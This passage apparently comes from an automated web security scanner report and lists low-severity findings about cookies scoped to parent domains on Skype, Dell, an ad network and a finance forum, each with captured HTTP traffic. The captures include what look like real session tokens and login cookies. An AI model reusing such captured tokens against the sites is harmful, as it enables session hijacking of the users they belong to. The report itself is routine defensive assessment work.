Referer: https://login.skype.com/account/login-form?product-type=package-global-region-landline-eu-unlimited&application=subscription&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin
Accept-Language: en-US

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:19:13 GMT
Server: Apache/2.2.3 (CentOS) mod_perl/2.0.4 Perl/v5.8.8
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: token=XnRHGFdzDJ8Inb%2Fhay3wwALOAzXiYWksbDCgNf6jldU%3D; domain=iesnare.com; path=/; expires=Wed, 01-Sep-2021 21:19:13 GMT; secure
p3p: CP="NON DSP COR CURa"
Keep-Alive: timeout=2, max=81
Connection: Keep-Alive
Content-Type: text/javascript
Expires: Sun, 04 Sep 2011 21:19:13 GMT
Content-Length: 29952

/* Copyright(c) 2009, iovation, inc. All rights reserved. Version: 3.0.0 */ window.io_last_error="";function isRipEnabled(){return window.io_enable_rip;}function contentUrl(){return __if_b(_i_f);}func
...[SNIP]...

10.4. http://msite.martiniadnetwork.com/index/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://msite.martiniadnetwork.com
Path:   /index/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index/?pid=1811702&sid=7696162854db74d954e7c2&loc=http%3A%2F%2Fwww.wallstreetoasis.com%2Fforums%2Fhoulihan-lokey-exit-opps&rnd=277040346&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey HTTP/1.1
Host: msite.martiniadnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MMNBASEID=21051315103139790868608; OptOut=no; MMNBASEVAL=dg1OGlDFQEGBWEfS7tLtvB2icx%2F43QwcZuByc7hC%2FFwpNwg2dcJs16mi0QkZqrufiuALx2jw6cCPE5uyZkG3w6gti9rk94qf4YBDg56Zb3DJpkERIlu9gyMTqr%2B1qet31h2TMOLXTWLXAEmslILn8GHESyuOt3NUKYvzzw%3D%3D; MMNATTR=IFEW09kJhL%2B4vn52PCYvaTZbe3g92AUd3icRwb8wT0yGEyQ%2FHCSgkxR0S3axnH8iWB6cSzqhcPm%2B8%2Flckb%2B%2BvtS5UUl3AroG8T%2B%2BMFT%2FyHfvAKlQxDC%2B9x0Q%2BpPydeyGBra3LWkVCZo4aOrGwRyVEw16t%2B006q%2BGQp%2Bg0goHUldyWQYRF839l7TaJ%2FrhAHCUPIoAyWZbaTrEF5JnWto%2FoNmkqAAt4n%2Fm4Hd72GSULxEvvWc3h00v4MuQG%2BKJLjiwWF8nQ5YwfNQhp%2BBc%2B9rSQN2KBZ0f%2FK7eFXxuTawHOWNHHcD7XK9F28ZqHNopTljY0R6t5chCPG5b2LlEvD1gN69o2yc6eBEZgllBkIOBANJtUlaCVa7EDc2iWO3ESSzdaDIdKANoLgTP

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:17:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Set-Cookie: MMNBASEID=21051315103139790868608; expires=Fri, 02-Mar-2012 16:17:06 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: OptOut=no; expires=Fri, 02-Mar-2012 16:17:06 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNBASEVAL=YWD1YmbiWuz7AsS1KVDCF1c5o35KnXdvno5Z0INmj%2F7CpqYepUldLb83WGMbDyg5ReCkbk08Zfg0TU0h%2BMdG5TrOM4XB%2FsDXXBqQGzGd3YSyniLCBefwGVsHiaM4wxoMFMIAI8Y04HfESuUDejuH3kHgzqk94%2BQxrR9q2jXy%2BU3GYjo%3D; expires=Fri, 02-Mar-2012 16:17:06 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNATTR=6pmOZDgtbdXFinvYjnkU10%2FCFThr2pTrkPV0IFbkxoUqTm%2BeAeoBnMC7S4NEVKOWoSpzXeOpE%2BjqrbypMl26KHbbr4%2ByR3YHOlWnPiLWKF91w7kXIcGu27%2F1gfrdQuiM81WwHxYm7B0CQz7i4ZlTtGBJHpa%2FhwhBtezlcJdSVMHhNuRCORFXN407RbsVUJzBVK4SxxDG5Iyy4GAF6hdooaCjrHfn2AL4B%2FIofXGGTj7K0PSVqYo2xlVsiMzwDE3kwDlR5yLTdb1M8%2F%2FY8wHAsLIYV6%2BNxun7AVMtlDBPo7belPN%2BFOUYfWQpY0DQJVALHnjc6qYeO5PKMCYsXrKPrUX3D0Gt7wGvkn25zJuPwoU4XjlCJMV5QsOKQwY1MJhqv1LUcd7xCLjE; expires=Fri, 02-Mar-2012 16:17:06 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSID=90315e9a956304f81bb261d08197857d; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSIDC=1; path=/; domain=.martiniadnetwork.com; httponly
Cache-Control: max-age=15552000
Expires: Fri, 02 Mar 2012 16:17:06 GMT
Vary: Accept-Encoding
Content-Length: 1288
Content-Type: text/html


var OAS_taxonomy = 'muid=21051315103139790868608';
var OAS_pubclick = 'http://msite.martiniadnetwork.com/action/track/type/0/pid/1811702/sid/7696162854db74d954e7c2/loc/http%3A%2F%2Fwww.wallstreetoa
...[SNIP]...

10.5. https://secure.skype.com/account/buy/package  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.skype.com
Path:   /account/buy/package

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/buy/package?product-type=package-global-region-landline-eu-unlimited HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: secure.skype.com
Connection: Keep-Alive
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0

Response

HTTP/1.1 302 Found
Server: nginx
Date: Sun, 04 Sep 2011 21:19:02 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: skype-session=l5p5g0er47bh75g44j3p4n46h7; path=/; domain=.skype.com; secure; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: skype-session-token=f351873bd098dac73b255b59a575ed557e0946bf; path=/; domain=.skype.com
Set-Cookie: return-account=https%3A%2F%2Fsecure.skype.com%2Faccount%2Fbuy%2Fpackage%3Fproduct-type%3Dpackage-global-region-landline-eu-unlimited; path=/
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-2012 21:19:02 GMT; path=/
Location: https://secure.skype.com/account/login?product-type=package-global-region-landline-eu-unlimited&application=subscription
Vary: User-Agent,Accept-Encoding
Content-Length: 0


10.6. https://secure.skype.com/account/login  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.skype.com
Path:   /account/login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/login?product-type=package-global-region-landline-eu-unlimited&application=subscription HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: secure.skype.com
Connection: Keep-Alive
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=f351873bd098dac73b255b59a575ed557e0946bf; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; skype-session=l5p5g0er47bh75g44j3p4n46h7; return-account=https%3A%2F%2Fsecure.skype.com%2Faccount%2Fbuy%2Fpackage%3Fproduct-type%3Dpackage-global-region-landline-eu-unlimited; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0

Response

HTTP/1.1 302 Found
Server: nginx
Date: Sun, 04 Sep 2011 21:27:09 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: skype-session-token=f351873bd098dac73b255b59a575ed557e0946bf; path=/; domain=.skype.com
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-2012 21:27:09 GMT; path=/
Location: https://login.skype.com/account/login-form?product-type=package-global-region-landline-eu-unlimited&application=subscription&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin
Vary: User-Agent,Accept-Encoding
Content-Length: 0


10.7. http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wallstreetoasis.com
Path:   /forums/houlihan-lokey-exit-opps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/houlihan-lokey-exit-opps HTTP/1.1
Host: www.wallstreetoasis.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:14:09 GMT
Server: Apache/2.2.8 (Ubuntu)
X-Powered-By: PHP/5.2.4-2ubuntu5.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
X-Drupal-Cache: MISS
Set-Cookie: SESS9095464dfa38d76be5c0e87191926453=ba27f64d25c838f1de7819db7dc7e5ce; expires=Tue, 27 Sep 2011 19:47:29 GMT; path=/; domain=.wallstreetoasis.com
Last-Modified: Sun, 04 Sep 2011 16:14:09 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 161677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<met
...[SNIP]...

10.8. http://142.xg4ken.com/media/redir.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://142.xg4ken.com
Path:   /media/redir.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/redir.php?prof=6&camp=4190&affcode=kw93350&cid=7516966884&networkType=search&k_clickid=AMS|_kenshoo_clickid_&url[]=https%3A%2F%2Fh41183.www4.hp.com%2Finflexion%2F%3Fcountry%3DUS%26language%3DUS%26campaigncode%3Dinflexion%26jumpid%3Dinflexion HTTP/1.1
Host: 142.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 16:18:39 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564; expires=Sat, 03-Dec-2011 16:18:39 GMT; path=/; domain=.xg4ken.com
Location: https://h41183.www4.hp.com/inflexion/?country=US&language=US&campaigncode=inflexion&jumpid=inflexion&k_clickid=AMS|200d2a28-23e9-a048-8372-00005235d564
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


10.9. http://accessories.us.dell.com/sna/DellPartsFamily.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/DellPartsFamily.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sna/DellPartsFamily.aspx HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 76867
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:06 GMT; path=/
Set-Cookie: StormSCookie=bandwidth=NA&js=1&flashversion=10; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:05 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Dell C
...[SNIP]...

10.10. http://accessories.us.dell.com/sna/ShopAllBrands.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/ShopAllBrands.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sna/ShopAllBrands.aspx HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 165178
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:26 GMT; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:25 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Shop B
...[SNIP]...

10.11. http://accessories.us.dell.com/sna/batteryconfig.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/batteryconfig.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sna/batteryconfig.aspx?c=us&cs=04&l=en&s=bsd HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23838
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:19 GMT; path=/
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:18 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Batter
...[SNIP]...

10.12. http://accessories.us.dell.com/sna/category.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/category.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sna/category.aspx?c=us&l=en&s=dhs&category_id=5914&cs=19 HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 122314
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|dhs|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:18 GMT; path=/
Set-Cookie: StormPCookie=bandwidth=NA&js=1&rpo_snp=A4186752,A4186751,A4186750; domain=.dell.com; expires=Sat, 04-Sep-2021 16:29:19 GMT; path=/
Set-Cookie: lwp=c=us&l=en&s=dhs&cs=19; domain=.dell.com; path=/
Set-Cookie: StormSCookie=~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:19 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>TVs -
...[SNIP]...

10.13. http://accessories.us.dell.com/sna/category.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/category.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sna/category.aspx?category_id= HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: StormSCookie=~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
Set-Cookie: lwp=c=us&l=en&s=dhs&cs=19; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:14 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Electr
...[SNIP]...

10.14. http://accessories.us.dell.com/sna/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/default.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sna/default.aspx?c=us&l=en&cs=04 HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 88780
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:31 GMT; path=/
Set-Cookie: StormPCookie=bandwidth=NA&js=1&rpo_snp=320-2676,320-9511,320-1748,320-9321; domain=.dell.com; expires=Sat, 04-Sep-2021 16:29:31 GMT; path=/
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:30 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Comput
...[SNIP]...

10.15. http://accessories.us.dell.com/sna/memconfig.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/memconfig.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sna/memconfig.aspx HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30746
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:58 GMT; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:58 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Comput
...[SNIP]...

10.16. http://accessories.us.dell.com/sna/printersupplies.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/printersupplies.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sna/printersupplies.aspx?c=us&cs=04&l=en&s=bsd&seg=bsd&step=4&~ck=mn HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 34551
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:22 GMT; path=/
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: StormSCookie=~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:22 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Printe
...[SNIP]...

10.17. http://accessories.us.dell.com/sna/productdetail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/productdetail.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sna/productdetail.aspx HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 149
Content-Type: text/html; charset=utf-8
Location: /sna/productnotfound.aspx?
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:44 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:44 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fsna%2fproductnotfound.aspx%3f">here</a>.</h2>
</body></html>

10.18. http://accessories.us.dell.com/sna/sna.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/sna.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sna/sna.aspx?c=us&cs=04&l=en&s=bsd&~topic=printer_shopall_inkjets&~ck=mn&~ck=mn HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 53137
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:25 GMT; path=/
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:25 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
